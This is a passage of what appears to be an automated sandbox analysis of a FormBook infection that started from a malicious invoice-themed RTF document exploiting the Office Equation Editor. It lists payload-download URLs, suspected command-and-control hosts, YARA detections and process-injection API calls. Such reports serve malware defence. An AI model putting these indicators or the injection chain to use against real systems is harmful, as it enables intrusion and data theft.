73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 14 May 2024 07:37:40 GMTContent-Type: text/htmlContent-Length: 580Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: gpgLFpElQuxhEi.exe, 0000000C.00000002.628854731.0000000000A23000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.primeplay88.org
            Source: gpgLFpElQuxhEi.exe, 0000000C.00000002.628854731.0000000000A23000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.primeplay88.org/ufuh/
            Source: dfrgui.exe, 00000008.00000002.629053445.0000000002D26000.00000004.10000000.00040000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.0000000003306000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.477631592.00000000019E6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
            Source: dfrgui.exe, 00000008.00000002.629053445.0000000002D26000.00000004.10000000.00040000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.0000000003306000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.477631592.00000000019E6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
            Source: dfrgui.exe, 00000008.00000002.629727705.0000000061E9E000.00000008.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drString found in binary or memory: http://www.sqlite.org/copyright.html.
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.usertrust.
            Source: dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.0000000000568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/opszx.scr
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/opszx.scrj
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.0000000000582000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/opszx.scrjjC:
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.0000000000568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covid19help.top/tc
            Source: dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
            Source: dfrgui.exe, 00000008.00000003.465868593.0000000006261000.00000004.00000020.00020000.00000000.sdmp, 13d6pS3.8.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: EQNEDT32.EXE, 00000002.00000002.351925217.00000000005BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: 13d6pS3.8.drString found in binary or memory: https://www.google.com/favicon.ico
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: dfrgui.exe, 00000008.00000002.629053445.00000000031DC000.00000004.10000000.00040000.00000000.sdmp, dfrgui.exe, 00000008.00000002.629450044.0000000005090000.00000004.00000800.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000002.629018538.00000000037BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
            Source: unknownHTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49163 version: TLS 1.2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.op33779.scr.1c0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.op33779.scr.1c0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.628678228.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.628640163.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.628854731.00000000009D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.477556208.0000000000270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401593026.00000000002A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.628611973.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.401776618.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: Beauty_Stem_Invoice.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 6.2.op33779.scr.1c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.op33779.scr.30a6390.4.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op33779.scr.30a6390.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 6.2.op33779.scr.1c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.op33779.scr.4030000.5.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op33779.scr.4030000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op33779.scr.203f154.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 5.2.op33779.scr.2041994.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000008.00000002.628678228.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.628640163.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000C.00000002.628854731.00000000009D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.477556208.0000000000270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.401593026.00000000002A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.355102505.0000000004030000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects downloader injector Author: ditekSHen
            Source: 00000008.00000002.628611973.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.401776618.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
            Source: Screenshot number: 4Screenshot OCR: Enable editing from the yellow bar above.The independent auditors' opinion says the financial state
            Office equation editor drops PE file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\op33779.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opszx[1].scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CB0C3 NtCreateSection,6_2_001CB0C3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CAA93 NtSetContextThread,6_2_001CAA93
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CB2E3 NtMapViewOfSection,6_2_001CB2E3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CBBB3 NtDelayExecution,6_2_001CBBB3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CACA3 NtResumeThread,6_2_001CACA3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CB513 NtCreateFile,6_2_001CB513
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CA673 NtSuspendThread,6_2_001CA673
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001EBF43 NtClose,6_2_001EBF43
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CB743 NtReadFile,6_2_001CB743
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CBFD3 NtAllocateVirtualMemory,6_2_001CBFD3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C1580 EntryPoint,NtProtectVirtualMemory,6_2_001C1580
